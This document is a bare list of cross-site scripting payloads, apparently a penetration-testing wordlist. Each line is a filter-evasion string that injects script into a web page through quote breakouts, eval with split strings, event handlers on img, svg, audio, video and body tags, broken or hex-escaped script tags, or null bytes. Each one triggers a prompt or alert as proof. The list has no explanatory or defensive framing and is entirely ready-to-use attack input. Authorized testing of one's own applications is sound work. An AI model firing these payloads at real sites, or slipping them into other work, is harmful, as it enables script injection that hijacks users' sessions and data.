";a=prompt,a()//
';a=prompt,a()//
'-eval("window['pro'%2B'mpt'](8)")-'
"-eval("window['pro'%2B'mpt'](8)")-"
"onclick=prompt(8)>"@x.y
"onclick=prompt(8)><svg/onload=prompt(8)>"@x.y
<image/src/onerror=prompt(8)>
<img/src/onerror=prompt(8)>
<image%20src/onerror=prompt(8)>
<img%20src/onerror=prompt(8)>
<image%20src%20=q%20onerror=prompt(8)>
<img%20src%20=q%20onerror=prompt(8)>
</scrip</script>t><img%20src%20=q%20onerror=prompt(8)>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>%20%20%20%20%20%20%20%20
'`"><\x00script>javascript:alert(1)</script>
<img%20src=1%20href=1%20onerror="javascript:alert(1)"></img>
<audio%20src=1%20href=1%20onerror="javascript:alert(1)"></audio>
<video%20src=1%20href=1%20onerror="javascript:alert(1)"></video>
<body%20src=1%20href=1%20onerror="javascript:alert(1)"></body>
<image%20src=1%20href=1%20onerror="javascript:alert(1)"></image>
<object%20src=1%20href=1%20onerror="javascript:alert(1)"></object>
<script%20src=1%20href=1%20onerror="javascript:alert(1)"></script>
<svg%20onResize%20svg%20onResize="javascript:javascript:alert(1)"></svg%20onResize>
<title%20onPropertyChange%20title%20onPropertyChange="javascript:javascript:alert(1)"></title%20onPropertyChange>
